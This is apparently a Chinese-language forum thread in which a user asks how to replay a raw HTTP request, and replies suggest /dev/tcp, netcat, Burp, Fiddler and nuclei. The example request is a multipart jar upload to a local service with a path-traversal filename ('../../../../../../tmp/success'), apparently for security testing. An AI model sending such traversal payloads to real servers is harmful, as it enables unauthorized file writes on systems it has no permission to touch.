例如
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
这样一段 HTTP 包,无论用 postman ,postwoman, curl 之类的工具都需要自行修改这个字符串以符合他们的使用格式, 有些不方便。
1
2wex 358 天前
`cat xxxxxxxx > /dev/tcp/127.0.0.1/80`
|
2
2wex 358 天前 1
或者 netcat `nc 127.0.0.1 80` 然后粘贴原始数据
|
3
chackchackGO OP @2wex 有在用, 但是偶尔看不到响应。 目前姑且用 burp 的 repeater 了。
|
4
jifengg 357 天前
我记得 Fiddler Classic 的 Composer 是可以的。选到“Raw”
|
5
moonheart 357 天前
|
6
proxytoworld 357 天前
修改哪个字符串,另外你要发送 raw 的 http 的话可以用 nuclei ,一个 yaml 搞定,你这是测试目录穿越吧
|
7
ThirdFlame 357 天前
nc xx.xx.xxx.xx 8081 < 1.txt
|